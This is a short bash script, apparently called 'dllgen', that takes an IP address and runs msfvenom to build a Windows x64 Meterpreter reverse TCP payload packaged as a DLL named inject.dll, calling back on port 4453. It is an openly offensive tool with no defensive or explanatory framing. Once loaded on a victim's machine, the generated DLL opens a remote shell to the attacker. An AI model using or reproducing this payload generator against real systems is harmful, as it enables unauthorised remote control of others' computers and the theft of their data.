#!/bin/bash
clear
echo -e "\e[96m"
echo -e " \e[1m"
echo "======================"
echo "Usage:"
echo "dllgen <127.0.0.1>"
echo "======================"

if [ $# -eq 0 ] ; then
    exit 1
fi

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$1 LPORT=4453 -f dll > inject.dll
